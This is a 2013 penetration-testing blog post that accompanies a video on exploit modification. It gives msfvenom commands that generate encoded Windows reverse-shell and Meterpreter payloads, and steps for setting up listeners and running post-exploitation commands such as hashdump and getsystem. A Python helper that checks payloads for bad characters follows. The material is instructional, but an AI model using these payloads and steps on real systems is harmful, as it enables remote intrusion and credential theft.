
Video: Basic Exploit Modification part 2: Changing Shellcode

posted Jan 13, 2013, 1:01 PM by Beau Bullock
In this video I am demonstrating basic shellcode modification. I show three popular types of shells: bind, reverse, and Meterpreter shells.

I modify the original bind shell to be a reverse shell. The original bind shell basically creates a listener on the target machine that we can connect to. But what if there was a firewall in between us that I couldn't connect through? This is where reverse shells come in handy. Instead of us connecting to the target, the target connects back to us, and you can usually find a port that is allowed outbound through a firewall.

Luckily, this exploit has plenty of space for shellcode, so no modification to the padding or NOP sled is necessary. All that is needed to change the shellcode is to copy the new payload over the old one.

Next, I create a Meterpreter payload and modify the shellcode accordingly. Meterpreter shells are very useful as they provide a lot of built-in post-exploitation functionality, including privilege escalation, hash dumping, keylogging and screenshotting.

The music in this video was written and recorded by yours truly.

1. Exploit target using original script and land the bind shell.

2. Use MSFVenom to create a reverse TCP payload: 
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4321 EXITFUNC=seh -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20" -i 2 

3. Copy it over the old shellcode

4. Set up a netcat listener on port 4321

5. Execute the exploit

6. Generate reverse Meterpreter payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4321 EXITFUNC=seh -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20" -i 2 

7. Copy it over the reverse TCP shellcode

8. Launch msfconsole and set up exploit/multi/handler

9. Execute the exploit again

10. Try some Meterpreter commands: sysinfo, getuid, getsystem, hashdump, screenshot
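A check for the "copy it over the old shellcode" steps (3 and 7) and for the claim above that the padding and NOP sled need no change. This is an added example, not code from the video or from the original post: it collects the \xHH escapes that msfvenom prints, flags any byte from the -b list used in the commands above, and reports whether the new payload still fits in the slot the old one occupied. The slot size, the buffer layout and the sample byte strings are constructed assumptions for the demo, not values from the exploit shown in the video.

```python
import re

# Bad-character list copied from the -b argument of the msfvenom commands above.
BAD_CHARS = b"\x00\x0a\x0d\x20"


def parse_escaped(text: str) -> bytes:
    """Collect every \\xHH escape in msfvenom-style output into raw bytes.

    The 'buf =' / 'buf +=' lines, quotes and line breaks are ignored, so the
    whole pasted block can be handed over as-is.
    """
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def find_bad_chars(payload: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (offset, byte) pairs for every disallowed byte in the payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def check_replacement(original: bytes, replacement: bytes,
                      slot_size: int, bad: bytes = BAD_CHARS) -> dict:
    """Report whether `replacement` can drop in where `original` sat.

    slot_size is the number of bytes available after the NOP sled (an assumed
    figure; the post only says the exploit has 'plenty of space').  A positive
    'growth' means the new payload is larger than the old one, which only
    matters when it would push past slot_size.
    """
    hits = find_bad_chars(replacement, bad)
    fits = len(replacement) <= slot_size
    return {
        "fits": fits,
        "growth": len(replacement) - len(original),
        "bad_chars": hits,
        "ok": fits and not hits,
    }


# --- constructed demo input (not real payloads) -------------------------------
OLD_PAYLOAD = bytes([0x41] * 351)   # stand-in for the original bind shell bytes
SLOT_SIZE = 700                     # assumed free space after the NOP sled

# Shaped like what msfvenom prints; the bytes are a made-up pattern.
NEW_PAYLOAD_TEXT = '''
buf =  ""
buf += "\\xde\\xad\\xbe\\xef\\xde\\xad\\xbe\\xef"
buf += "\\x90\\x90\\x90\\x90"
'''

# Same shape with one byte from the bad-char list slipped in.
BROKEN_TEXT = 'buf += "\\xde\\xad\\x0a\\xef"'


def demo() -> dict:
    """Run both constructed samples and return their reports."""
    good = check_replacement(OLD_PAYLOAD, parse_escaped(NEW_PAYLOAD_TEXT), SLOT_SIZE)
    bad = check_replacement(OLD_PAYLOAD, parse_escaped(BROKEN_TEXT), SLOT_SIZE)
    return {"good": good, "bad": bad}


if __name__ == "__main__":
    for name, report in demo().items():
        print(name, report)
```

If the report shows a bad-char hit, the -b list handed to msfvenom did not cover the byte, or the output was pasted with a stray escape; if `fits` is false, the padding and NOP sled do need adjusting after all, contrary to the easy case in the video.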